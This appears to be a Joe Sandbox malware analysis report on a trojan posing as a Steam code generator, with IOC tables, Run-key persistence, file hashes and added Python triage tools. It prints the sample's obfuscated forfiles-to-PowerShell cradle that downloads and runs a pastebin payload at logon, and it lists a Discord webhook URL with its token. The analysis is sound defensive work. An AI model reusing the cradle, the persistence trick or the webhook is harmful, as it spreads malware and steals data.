https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 | true | - | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt | false | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1958904116.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943654645.0000025E818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1943654645.0000025E80232000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X- | steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://github.com/ | steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://github.com/user-attachments/files/17267811/stm.txt$ | steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://github.com/user-attachments/files/17267811/stm.txt%pinvalid | steamcodegenerator.exe | false | - | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/user-attachments/files/17267811/stm.txtnp | steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1958904116.0000025E901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943654645.0000025E818D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1958904116.0000025E90080000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://objects.githubusercontent.com/ | steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF311C000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://github.com/user-attachments/files/17267811/stm.txta | steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF30AB000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://github.com/user-attachments/files/17267811/stm.txtll | steamcodegenerator.exe, 00000000.00000002.3629347869.0000022AF305C000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://oneget.orgX | powershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1943654645.0000025E80001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1943654645.0000025E80001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.org | powershell.exe, 00000002.00000002.1943654645.0000025E81632000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.19.24 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
162.159.138.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
140.82.121.3 | github.com | United States | 36459 | GITHUBUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1534102
Start date and time: 2024-10-15 15:58:21 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: steamcodegenerator.exe
Detection: MAL
Classification: mal96.troj.evad.winEXE@21/17@5/4
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 12
• Number of non-executed functions: 73
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7628 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: steamcodegenerator.exe
Time | Type | Description
14:59:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value "OneDrive File Sync" = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
14:59:49 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, value "OneDrive File Sync" = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
The value name imitates OneDrive and the data is a shortcut rather than an executable, so a Run-key audit that only inspects .exe paths would miss this entry; the target of the .lnk has to be resolved to see what actually runs at logon.
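Because the Run value points at a shortcut, the first triage step is to read what BeginSync.lnk launches without executing it. The parser below is an added example and not part of the Joe Sandbox report: it walks the Shell Link layout (MS-SHLLINK: 76-byte header, optional LinkTargetIDList and LinkInfo, then the StringData fields NAME, RELATIVE_PATH, WORKING_DIR, COMMAND_LINE_ARGUMENTS, ICON_LOCATION, each a 2-byte character count followed by UTF-16LE text) and returns the target and command line. The dropped file itself is not on this page, so the block assembles a constructed fixture carrying the relative path and argument string transcribed from the dropped-file preview further down; the dummy IDList/LinkInfo blocks and the header field values are placeholders, not bytes of the real sample.

```python
"""Pull target and command line out of a Windows Shell Link (.lnk) without running it.

Added triage example, not code from the report or the sample. Layout per MS-SHLLINK.
"""
import struct
from typing import Dict

# Shell Link CLSID {00021401-0000-0000-C000-000000000046}, little-endian on disk.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that decide which optional structures and StringData fields follow.
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
               (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))


def parse_lnk_strings(data: bytes) -> Dict[str, str]:
    """Return the StringData fields of a .lnk (only those the LinkFlags say are present)."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_IDLIST:                          # IDListSize (2 bytes) then the IDList itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                        # LinkInfoSize (4 bytes) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out: Dict[str, str] = {}
    for bit, key in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # character count, no terminator
        pos += 2
        if flags & IS_UNICODE:
            out[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return out


def build_lnk(relative_path: str, arguments: str, idlist: bytes = b"", link_info: bytes = b"") -> bytes:
    """Assemble a minimal Unicode .lnk; a constructed fixture standing in for the dropped file."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    body = b""
    if idlist:                                      # opaque to this parser, only skipped
        flags |= HAS_IDLIST
        body += struct.pack("<H", len(idlist)) + idlist
    if link_info:
        flags |= HAS_LINKINFO
        body += struct.pack("<I", 4 + len(link_info)) + link_info
    # HeaderSize, CLSID, LinkFlags, FileAttributes (ARCHIVE), three FILETIMEs, FileSize,
    # IconIndex, ShowCommand (SW_SHOWMINNOACTIVE = 7), HotKey, Reserved1..3 (placeholder values).
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 69632, 0, 7, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + body + string_data(relative_path) + string_data(arguments)


# Transcribed from the report's preview of the dropped BeginSync.lnk.
RELATIVE_PATH = r"..\..\..\Windows\System32\forfiles.exe"
ARGUMENTS = ('/p c:\\windows\\system32 /m notepad.exe /c "powershell.exe -command powershell '
             "-windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; "
             "calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'\"")


def triage_fixture() -> Dict[str, str]:
    """Build the fixture (with dummy IDList and LinkInfo blocks) and parse it back."""
    lnk = build_lnk(RELATIVE_PATH, ARGUMENTS, idlist=bytes(20), link_info=bytes(24))
    return parse_lnk_strings(lnk)


if __name__ == "__main__":
    for key, value in triage_fixture().items():
        print(f"{key}: {value}")
```

Run against a real dropped shortcut, `parse_lnk_strings(open(path, "rb").read())` gives the same two fields; the relative path resolves from the shortcut's own directory (here C:\ProgramData\Microsoft OneDrive\FileSync\ up three levels to C:\), which is why a relative target is enough for the malware and why the LinkInfo local path should be compared with it during triage.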
IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.19.24 | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | pastebin.com/raw/sA04Mwk2
172.67.19.24 | BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | envifa.vbs | malicious | Unknown | pastebin.com/raw/V9y5Q5vv
172.67.19.24 | sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
172.67.19.24 | Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | Dadebehring PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
162.159.138.232 | Lm9IJ4r9oO.exe | malicious | Unknown | (none)
162.159.138.232 | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | (none)
162.159.138.232 | OSLdZanXNc.exe | malicious | Unknown | (none)
162.159.138.232 | cr_asm.ps1 | malicious | Unknown | (none)
162.159.138.232 | SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exe | malicious | Unknown | (none)
162.159.138.232 | SecuriteInfo.com.Python.Muldrop.18.50.31694.exe | malicious | Blank Grabber | (none)
162.159.138.232 | Exela(1).exe | malicious | Exela Stealer, Python Stealer | (none)
162.159.138.232 | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | (none)
162.159.138.232 | http://relay.csgoze520.com/ | malicious | Unknown | (none)
Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
discord.com | Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.138.232
discord.com | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232
discord.com | OSLdZanXNc.exe | malicious | Unknown | 162.159.138.232
discord.com | BeginSync lnk.lnk | malicious | Unknown | 162.159.137.232
discord.com | gaber.ps1 | malicious | Unknown | 162.159.137.232
discord.com | cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
discord.com | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.135.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.136.232
raw.githubusercontent.com | Lm9IJ4r9oO.exe | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 185.199.111.133
raw.githubusercontent.com | OSLdZanXNc.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | gaber.ps1 | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | cr_asm_crypter.ps1 | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | cr_asm.ps1 | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, FormBook | 185.199.108.133
objects.githubusercontent.com | SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exe | malicious | Unknown | 185.199.108.133
objects.githubusercontent.com | SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exe | malicious | Unknown | 185.199.110.133
objects.githubusercontent.com | SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exe | malicious | Unknown | 185.199.111.133
objects.githubusercontent.com | SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exe | malicious | Unknown | 185.199.111.133
objects.githubusercontent.com | https://www.newtonsoft.com/json | malicious | Unknown | 185.199.108.133
objects.githubusercontent.com | WCA-Cooperative-Agreement.docx.exe | malicious | Babadeda, Exela Stealer, Python Stealer, Waltuhium Grabber | 185.199.111.133
objects.githubusercontent.com | SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe | malicious | Unknown | 185.199.111.133
objects.githubusercontent.com | SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe | malicious | Unknown | 185.199.108.133
objects.githubusercontent.com | SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe | malicious | Unknown | 185.199.108.133
github.com | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 140.82.112.4
github.com | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 140.82.121.3
github.com | Telex-copy-pdf.jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.4
github.com | https://www.mycimalive.com/ | malicious | Unknown | 140.82.121.4
github.com | Payment.Telex-pdf (2).jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.3
github.com | Payment.Telex-pdf.jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.4
github.com | srSirV44HB.jar | malicious | Branchlock Obfuscator, STRRAT | 140.82.121.3
github.com | Request For Quotation.js | malicious | STRRAT | 140.82.121.3
ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24
CLOUDFLARENETUS | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232
CLOUDFLARENETUS | OSLdZanXNc.exe | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161
CLOUDFLARENETUS | gaber.ps1 | malicious | Unknown | 162.159.137.232
CLOUDFLARENETUS | cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
CLOUDFLARENETUS | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | HqvlYZC7Gf.exe | malicious | Unknown | 104.27.206.92
FASTLYUS | Lm9IJ4r9oO.exe | malicious | Unknown | 185.199.111.133
FASTLYUS | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 185.199.111.133
FASTLYUS | OSLdZanXNc.exe | malicious | Unknown | 185.199.109.133
FASTLYUS | BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133
FASTLYUS | gaber.ps1 | malicious | Unknown | 185.199.108.133
FASTLYUS | cr_asm_crypter.ps1 | malicious | Unknown | 185.199.110.133
FASTLYUS | cr_asm.ps1 | malicious | Unknown | 185.199.108.133
FASTLYUS | https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 151.101.1.229
FASTLYUS | na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
JA3 Fingerprints
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Lm9IJ4r9oO.exe | malicious | Unknown | 172.67.19.24, 162.159.138.232, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24, 162.159.138.232, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24, 162.159.138.232, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | OSLdZanXNc.exe | malicious | Unknown | 172.67.19.24, 162.159.138.232, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | BeginSync lnk.lnk | malicious | Unknown | 172.67.19.24, 162.159.138.232, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | gaber.ps1 | malicious | Unknown | 172.67.19.24, 162.159.138.232, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm_crypter.ps1 | malicious | Unknown | 172.67.19.24, 162.159.138.232, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm.ps1 | malicious | Unknown | 172.67.19.24, 162.159.138.232, 185.199.109.133
3b5074b1b5d032e5620f69f9f700ff0e | https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 172.67.19.24, 162.159.138.232, 185.199.109.133
37f463bf4616ecd445d4a1937da06e19 | Lm9IJ4r9oO.exe | malicious | Unknown | 185.199.109.133, 140.82.121.3
37f463bf4616ecd445d4a1937da06e19 | Factura.exe | malicious | GuLoader, Snake Keylogger | 185.199.109.133, 140.82.121.3
37f463bf4616ecd445d4a1937da06e19 | Prximos VencimientosPDF.exe | malicious | FormBook, GuLoader | 185.199.109.133, 140.82.121.3
37f463bf4616ecd445d4a1937da06e19 | dg_official01.exe | malicious | GuLoader | 185.199.109.133, 140.82.121.3
37f463bf4616ecd445d4a1937da06e19 | doc-Impostos.cmd | malicious | Unknown | 185.199.109.133, 140.82.121.3
37f463bf4616ecd445d4a1937da06e19 | 9evHLnwull.exe | malicious | Vidar | 185.199.109.133, 140.82.121.3
37f463bf4616ecd445d4a1937da06e19 | Proforma_InvoicePDF.exe | malicious | FormBook, GuLoader | 185.199.109.133, 140.82.121.3
37f463bf4616ecd445d4a1937da06e19 | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 185.199.109.133, 140.82.121.3
37f463bf4616ecd445d4a1937da06e19 | Request for Quotation MK FMHS.RFQ.10.24.vbs | malicious | GuLoader, Snake Keylogger | 185.199.109.133, 140.82.121.3
                                                                      No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
Category: dropped
Size (bytes): 1728
Entropy (8bit): 4.527272298423835
Encrypted: false
SSDEEP: 24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
MD5: 724AA21828AD912CB466E3B0A79F478B
SHA1: 41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
SHA-256: D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
SHA-512: B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
Malicious: true
Preview: L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
Decoded (the StringData is UTF-16LE, so the preview shows every null byte as a dot): this is the BeginSync.lnk registered in the Run key at 14:59:41. Local path C:\Windows\System32\forfiles.exe, relative path ..\..\..\Windows\System32\forfiles.exe, command-line arguments:
/p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
forfiles enumerates c:\windows\system32 for the single match notepad.exe and runs the /c command once for it, so the shortcut is a LOLBin proxy for a hidden (-windowstyle h) PowerShell. That script defines the aliases callit -> iex (Invoke-Expression) and, via sal $env:os, an alias literally named Windows_NT -> iwr (Invoke-WebRequest); since alias lookup is case-insensitive, calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing) is iex (iwr pastebin.com/raw/sA04Mwk2 -UseBasicParsing), a download-and-execute cradle fetching the paste at every logon. The sal fatbake calc alias is never used and exists only to pad the command line. Detections keyed on the literal strings iex, Invoke-Expression or DownloadString do not match this command line; forfiles.exe /c spawning powershell.exe, and a Run value whose data is a .lnk under ProgramData, are the robust signals here.
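The argument string above hides the cradle behind aliases created with sal (Set-Alias), one of them named after the value of an environment variable. The helper below is an added example, not code from the report or from the sample: it strips the alias definitions, substitutes the cmdlets they stand for (following chains through PowerShell's own built-in aliases) and flags the Invoke-Expression-of-Invoke-WebRequest pattern. It assumes $env:OS expands to Windows_NT (which holds on every NT-based Windows) and handles only the positional `sal Name Value` form; INNER_SCRIPT and LNK_ARGS are transcribed from the preview, and extract_inner_script pulls the innermost single-quoted -command payload out of the forfiles -> powershell -> powershell nesting.

```python
"""Normalise a Set-Alias (sal) obfuscated PowerShell one-liner for triage.

Added example, not code from the Joe Sandbox report or the sample. Assumptions:
$env:OS expands to "Windows_NT"; aliases use the positional form `sal Name Value`.
"""
import re
from typing import Dict, List

# Aliases PowerShell defines by default (a subset of the real built-ins).
BUILTIN_ALIASES: Dict[str, str] = {
    "iex": "Invoke-Expression",
    "iwr": "Invoke-WebRequest",
    "irm": "Invoke-RestMethod",
    "curl": "Invoke-WebRequest",
    "wget": "Invoke-WebRequest",
}

# Assumed environment, used only to expand $env:NAME inside alias names.
ASSUMED_ENV: Dict[str, str] = {"os": "Windows_NT"}

# Inner script transcribed from the dropped BeginSync.lnk preview.
INNER_SCRIPT = ("sal fatbake calc;sal callit iEx; sal $env:os iWr; "
                "calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)")

# Full forfiles argument string from the same shortcut, to show the nesting.
LNK_ARGS = ('/p c:\\windows\\system32 /m notepad.exe /c "powershell.exe -command '
            "powershell -windowstyle h -command '" + INNER_SCRIPT + "'\"")

SAL_RE = re.compile(r"^\s*(?:sal|set-alias)\s+(\S+)\s+(\S+)\s*$", re.IGNORECASE)
ENV_RE = re.compile(r"\$env:(\w+)", re.IGNORECASE)
WORD_RE = re.compile(r"[A-Za-z_][\w-]*")
URL_RE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}/[^\s'\")]+", re.IGNORECASE)


def extract_inner_script(lnk_args: str) -> str:
    """Return the script inside the innermost `-command '...'` of the LNK arguments."""
    m = re.search(r"-command\s+'([^']*)'", lnk_args, re.IGNORECASE)
    if m is None:
        raise ValueError("no single-quoted -command payload found")
    return m.group(1)


def canonical(name: str, aliases: Dict[str, str]) -> str:
    """Follow alias chains (script-defined first, then built-in) to a cmdlet name."""
    seen = set()
    cur = name
    while cur.lower() not in seen:           # stop on cycles such as `sal a b; sal b a`
        seen.add(cur.lower())
        nxt = aliases.get(cur.lower()) or BUILTIN_ALIASES.get(cur.lower())
        if nxt is None:
            break
        cur = nxt
    return cur


def deobfuscate(script: str, env: Dict[str, str] = ASSUMED_ENV) -> Dict[str, object]:
    """Drop `sal` statements, substitute the aliases they create, and flag a download cradle."""
    aliases: Dict[str, str] = {}
    kept: List[str] = []
    for stmt in script.split(";"):
        m = SAL_RE.match(stmt)
        if m:
            # Alias names are case-insensitive; $env:OS becomes the literal name Windows_NT.
            alias_name = ENV_RE.sub(lambda e: env.get(e.group(1).lower(), e.group(0)), m.group(1))
            aliases[alias_name.lower()] = canonical(m.group(2), aliases)
        elif stmt.strip():
            kept.append(stmt.strip())
    normalized = "; ".join(WORD_RE.sub(lambda w: canonical(w.group(0), aliases), s) for s in kept)
    urls = URL_RE.findall(normalized)
    cradle = "Invoke-Expression" in normalized and any(
        c in normalized for c in ("Invoke-WebRequest", "Invoke-RestMethod"))
    return {"aliases": aliases, "normalized": normalized, "urls": urls, "download_cradle": cradle}


if __name__ == "__main__":
    for key, value in deobfuscate(extract_inner_script(LNK_ARGS)).items():
        print(f"{key}: {value}")
```

On the report's string the normalized form is Invoke-Expression(Invoke-WebRequest pastebin.com/raw/sA04Mwk2 -usebasicparsing) with the decoy alias fatbake -> calc left unused. Running this normalisation over PowerShell command lines before rule matching is what lets a cmdlet-name rule fire on a sample like this one; a rule on the raw text sees neither iex nor iwr.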
Process: C:\Users\user\Desktop\steamcodegenerator.exe
File Type: data
Category: dropped
Size (bytes): 39510
Entropy (8bit): 7.693386599727056
Encrypted: false
SSDEEP: 768:J8AiMUiDCHFlDY8E5X+2ewgdXC8pgpfcS7iKGztVuanh8w2OfJ:J8EUsCHFlDY3+2YBC8WJcS7i9u6ye
MD5: EBE145BD87E74B4BCA45E87525372F04
SHA1: EBE63CBA99F213980C7A94BACD580B347D740D4E
SHA-256: A53308B29B375BBE5140B8FC3781FE0E2F0F6F06A447C0F27AC9189F20B2F4B1
